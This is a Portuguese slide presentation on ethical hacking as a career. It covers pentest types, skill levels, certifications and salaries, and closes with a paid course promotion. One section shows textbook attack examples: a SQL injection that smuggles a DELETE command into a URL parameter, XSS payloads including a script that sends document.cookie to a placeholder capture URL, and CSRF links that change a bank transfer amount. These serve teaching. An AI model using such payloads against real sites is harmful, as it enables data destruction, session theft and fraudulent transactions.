Post on 13-Apr-2017
A importância do profissional
Hacker Ético no mercado
Marcos Flávio Araújo Assunção
mflavio@defhack.com
Marcos Flávio Araújo Assunção
Formação:
Mestre em Sistemas de Informação pela Universidade Fumec
Especialista em Redes de Computadores pela ESAB
Especialista em Docência para o ensino profissional pelo Senac Minas
Graduado em Engenharia de Software pelo Centro Universitário UMA
Atuação:
Professor universitário no Centro Universitário UNA
Orientador de curso no Senac Minas
Consultor e palestrante em segurança de redes e ensino profissionalizante
Marcos Flávio Araújo Assunção
Certificações
CEH
CCNA
Cisco ITQ
Publicações:
Guia do Hacker Brasileiro
Desafio Linux Hacker
Segredos do Hacker Ético
(5 edições)
Honeypots e Honeynets
Wireless Hacking
Projetos:
Valhala Honeypot
Por que a área de IT
Security cresce tanto?
Principais problemas (Fonte: govtech.com)
Como o mercado vê o
Hacker ético
profissional?
Forbes – Hacker Ético é uma das
principais carreiras do futuro
Governo americano recruta hackers
globodigital
Cresce a busca pelo Hacker Ético
jornal-o-globo
MCT convida movimento Hacker
brasilgov
Precisa-se de Hackers experientes
estadominas-online
Quanto é o salário de
um Pentester (Ethical
Hacker) ?
Fonte: indeed.com
Pagamento médio CEH (Fonte: softwareadvice.com)
Linkedin: a fonte de oportunidades em Ethical Hacking
Freelancing em Ethical Hacking
O que faz um
profissional Hacker
Ético / Pentester ?
Penetration Test (Teste de Invasão)
Consiste em utilizartécnicas de Hackers emtestes de stress da segurança de redes e sistemas
É a principal ferramentade um Hacker Ético
CEH, LPT, Ethical Hacking Foundation, OCSP, GWAPT, GPEN, etc.
Padrões e entidades que exigem Penetration Tests
Teste de “stress” – Uma necessidade real
Teste de “stress” - Pressão
capacete
Teste de “stress” - Temperatura
flame-test-helmet
Fases de um PenTest
Tipos de Penetration Test
Black Box
White Box
Gray Box
Black Box
Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.
Gray Box
Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.
White Box
Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.
Níveis de um Pentester / Ethical Hacker
Nível 1 – Júnior – Tool based Penetration Tester:Esse profissional é aquele que somente conhece as ferramentas básicas parao pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas.Muitas vezes aprenderam as técnicas em treinamentos específicos. Aqui estão as certificações CEH, ECSA, LPT, Ethical Hacking Foundation, GPen e GWapt
Nível 2 – Pleno – Coding based Penetration Tester:Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda está limitado ao teste de vulnerabilidades já conhecidas. Consegue entretanto melhorar soluções existentes, como criar novos módulos para o Metasploit. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Temos nesse nível o OSCP.
Nível 3 – Sênior – Vulnerability Researcher:Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. Ainda não existe uma certificação de peso neste nível.
Certificações de
Ethical Hacking
EXIN Ethical Hacking Foundation
EC-COUNCIL Certified Ethical Hacker (CEH)
EC-COUNCIL ECSA Pentest
ECCOUNCIL Licensed Penetration Tester
GIAC - GPEN
GIAC GWAPT
Offensive Security Certified Professional
Exemplos de
vulnerabilidades
testadas
Falhas de softwares
Buffer Overflows
(Stack e Heap)
Strings de format
vulneráveis
Memory corruption
Injection (SQL,
XPATH, CMD, XSS,
CSRF)
Permissões incorretas
SQL Injection
GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users
WHERE 1=‘1 HTTP/1.1
SELECT *
FROM users
WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’
Cross Site Scripting <XSS>
<script> alert(‘Oi’!) </script>
<script>
location.href=“http://www.site.com/captura.cfm?c=“
+ document.cookie</script>
<a href=“javascript#[código]>
<div style=“behaviour: url([código]);”>
<body onload=“[código]”>
<img src=“javascript:[código]”>
Cross Site Request Forgery (CSRF)
Exemplo: Maria está logada no site do banco e a URL da transação é:
http://banco.com/transf?conta=MARIA&quantia=100
Um ataque pode criar um link que altera o valor da transação:
<a href=http://banco.com/transf?conta=MARIA$quantia=100000>
Ou uma imagem “falsa”:
<img src=http://banco.com/transf?conta=MARIA$quantia=100000>
Quero atuar na área.
Como começar?
Treinamento em Fundamentos de Ethical Hacking
• 21 horas de vídeos
• 175 aulas
• Acesso ilimitado e eterno
• Certificado internacional
• Conteúdo aborda a maioria
das certificações de PenTest
• 50% de desconto: pague apenas 100
reais pelo curso.
Acesse para aproveitar a promoção:
www.marcosflavio.com.br
Dúvidas?
A importância do profissional
Hacker Ético no mercado
Marcos Flávio Araújo Assunção
mflavio@defhack.com